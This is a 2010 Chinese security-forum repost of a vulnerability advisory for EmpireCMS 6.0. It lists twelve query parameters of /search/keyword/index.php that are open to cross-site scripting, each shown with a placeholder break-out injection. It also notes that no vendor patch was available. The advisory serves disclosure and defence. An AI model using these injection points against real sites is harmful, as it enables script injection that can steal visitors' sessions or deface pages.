帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞(页 1) - 0day发布 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

keylong 发表于 2010-6-4 23:07

帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞

帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞

文章录入：浣花溪责任编辑：snow 18
【字体：小大】

影响版本:
帝国（EmpireCMS）6.0
漏洞描述:
帝国软件是一家专注于网络软件开发的科技公司，其主营产品“帝国网站管理系统(EmpireCMS)”是目前国内应用最广泛的CMS程序。通过多年的不断创新与完善，使系统集安全、强大、稳定、灵活于一身。

目前EmpireCMS程序已经广泛应用在国内数十万家网站，覆盖国内上千万上网人群，并经过上千家知名网站的严格检测，被称为国内最稳定的CMS系统。

/search/keyword/index.php 存在多个跨站漏洞<*参考
[email]s1@sebug.net[/email]
[url]http://sebug.net/vulndb/19733/[/url]
*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负![url]http://ssvdb.com/search/keyword/index.php?show=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?classid=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?tbname=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?tempid=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?starttime=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?endtime=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?startprice=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?endprice=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?orderby=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?myorder=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?keyboard=3[/url]">[xss]
[url]http://ssvdb.com/search/keyword/index.php?allsame=3[/url]">[xss]SEBUG安全建议:
厂商补丁：

phome.net
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

帝国（EmpireCMS）6.0 /search/keyword/index.php 存在多个跨站漏洞